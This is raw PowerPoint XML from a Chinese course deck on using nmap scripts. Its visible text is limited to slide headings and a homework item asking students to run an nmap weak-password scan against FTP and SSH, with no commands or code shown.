            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目评价】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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22" name="矩形 21"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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23" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="13" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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TextBox 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354455" y="2427605"/>
            <a:ext cx="9048750" cy="7385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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容结束</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
              <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9500870" y="5334000"/>
            <a:ext cx="2261870" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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8" presetClass="entr" presetSubtype="0" accel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="50000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="-45.0"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="-45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="69900">
                                          <p:val>
                                            <p:fltVal val="45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="39" decel="50000" autoRev="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="34" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="216"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>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 grpId="0"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【作业布置】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649605" y="1952625"/>
            <a:ext cx="9040495" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" indent="-742950" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成nmap的FTP和SSH弱密码扫描。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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TextBox 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354455" y="2427605"/>
            <a:ext cx="9048750" cy="7385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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容结束</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
              <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9500870" y="5334000"/>
            <a:ext cx="2261870" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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8" presetClass="entr" presetSubtype="0" accel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="50000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="-45.0"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="-45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="69900">
                                          <p:val>
                                            <p:fltVal val="45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="114" fill="hold">
                                          <p:stCondLst>
